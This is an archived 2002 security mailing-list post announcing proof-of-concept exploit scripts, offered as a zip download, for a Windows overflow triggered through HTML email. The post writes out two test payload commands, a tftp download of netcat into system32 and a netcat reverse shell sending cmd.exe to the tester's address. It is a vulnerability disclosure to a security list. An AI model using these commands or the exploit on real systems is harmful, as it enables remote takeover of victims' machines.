Hello all, For some reason my previous posts did not make it onto security focus ?-) The following is a link to proof of concept code /exploit code for this overflow. The shell code is relatively small but effective if used correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and a html output file. There are two versions included in the zip. http://www.sec-1.com/help.zip HelpMe.pl // Was written to work with my machine Kernel32.dll version 5.0.2195.4272 (Rare ?) HelpMe2.pl // Was written to work with all other machines I tested. kernel32.dll version 5.0.2195.2778 I have tested the exploit using two html emails. email 1 Executes tftp.exe -i my.ip.address get nc.exe c:\winnt\system32\nc.exe email 2 Executes nc.exe my.ip.address 80 -e cmd.exe If the exploit executes correctly exitprocess()is called so no error occurs. Kind Regards Gary O'leary-Steele XScan Team www.Sec-1.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Mon Aug 12 2002 - 09:02:49 PDT